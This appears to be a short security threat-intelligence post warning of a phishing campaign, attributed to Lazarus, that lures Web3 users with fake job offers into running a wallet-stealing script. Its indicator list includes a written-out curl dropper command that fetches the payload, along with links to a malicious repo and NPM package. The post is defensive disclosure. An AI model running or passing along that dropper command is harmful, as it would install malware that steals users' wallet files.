🚨 Security TI Alert 🚨 According to community partner @1nf

🚨 Security TI Alert 🚨
According to community partner @1nf0s3cpt, an active phishing campaign is targeting Web3 users with fake job offers (e.g. $120/hour) to trick them into executing a malicious script that steals wallet files.
🔍 Key IOCs:
🔸GitLab repo: https://t.co/ivGN93PS4b
🔸Dropper: curl https://t.co/fwRuktoVd9 -H "x-secret-key: _"
🧪 The attack method is very similar to the previous Lazarus use of NPM packages to spread malicious code:
https://t.co/bBC4i2vYpA
🚨 We found that a new malicious NPM package was just published:
https://t.co/SjgmO1FOIL
🔸Likely linked GitHub: apollo-hero
🔸Uploader email: skelstar125@gmail.com
⚠️ Do NOT install or run unknown packages or scripts. Always verify sources.
#LAZARUS #Phishing

.css-1iqe90x{box-sizing:border-box;margin:0;min-width:0;color:#EAECEF;}🚨 Security TI Alert 🚨

🚨 Security TI Alert 🚨